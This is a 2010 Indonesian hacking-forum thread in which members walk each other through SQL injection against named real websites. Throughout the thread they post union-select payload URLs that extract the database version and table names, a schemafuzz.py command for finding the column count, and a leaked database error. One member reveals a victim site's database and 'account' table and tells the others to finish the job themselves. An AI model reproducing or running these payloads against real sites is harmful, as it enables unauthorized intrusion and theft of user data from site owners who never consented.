Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Bug] SQL injection pada News Read ID (read.php?)

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby shinichi81 » Mon May 31, 2010 10:25 am

boleh disikat nih bos poni..........
............make a wish............
User avatar
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby peniru » Mon May 31, 2010 4:02 pm

shinichi81 wrote:boleh disikat nih bos poni..........


:love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
User avatar
peniru
 
Posts: 383
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby cyber_criminal » Mon May 31, 2010 4:53 pm

@om poni : om saya nyoba cek sqli di site ini :
Code: Select all
http://www.wellerpools.com/news-read.php?id=16'


trus pas saya cek versi mysqlnya ternyata versi 4,
Code: Select all
http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,version%28%29,3,4,5,6,7,8,9,10


saya coba cek isi tablenya,
Code: Select all
http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database%28%29--


eh malah keluar pesan, kayak gini :
Code: Select all
SELECT * FROM news WHERE news_id=-16 union select all 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'


apa yg mesti saya lakukan mas bila menghadapi hal seperti ini ? mohon pencerahannya
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby cyber_criminal » Mon May 31, 2010 5:00 pm

@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'


pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000


bingung saya mas
:pusing: :pusing: :pusing:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby peniru » Mon May 31, 2010 5:27 pm

cyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'


pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000


bingung saya mas
:pusing: :pusing: :pusing:


kk coba pake schemafuzz.py untuk find jumlah columnnya.

Code: Select all
./schemafuzz.py --findcol -u "http://campus.sanook.com/inlove/read.php?id=132"


moga membantu :maaf: :maaf:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
User avatar
peniru
 
Posts: 383
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby cyber_criminal » Mon May 31, 2010 5:53 pm

cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby poni » Mon May 31, 2010 6:01 pm

cyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'


pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000


bingung saya mas
:pusing: :pusing: :pusing:


Database : learntolove
Table : account

sisanya lanjutkan sendiri
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby cyber_criminal » Mon May 31, 2010 6:07 pm

ok makasih om poni
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby x3nophobi4 » Fri Jun 04, 2010 4:32 pm

Mantep....dah...nyoba ah... :malumalu:
-- Brigade @l Bantani --
User avatar
x3nophobi4
 
Posts: 8
Joined: Fri Jun 04, 2010 4:18 pm
Location: [ Banten NKRI ]

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby shinichi81 » Fri Jun 04, 2010 5:53 pm

cyber_criminal wrote:cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:


pertama-tama instal dulu phyton,abis itu cari cmd...baru abis itu panggil tuh schemafuzzy.py :tapa: :tapa: :tapa:
............make a wish............
User avatar
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

leave a comment

PreviousNext

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 4 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id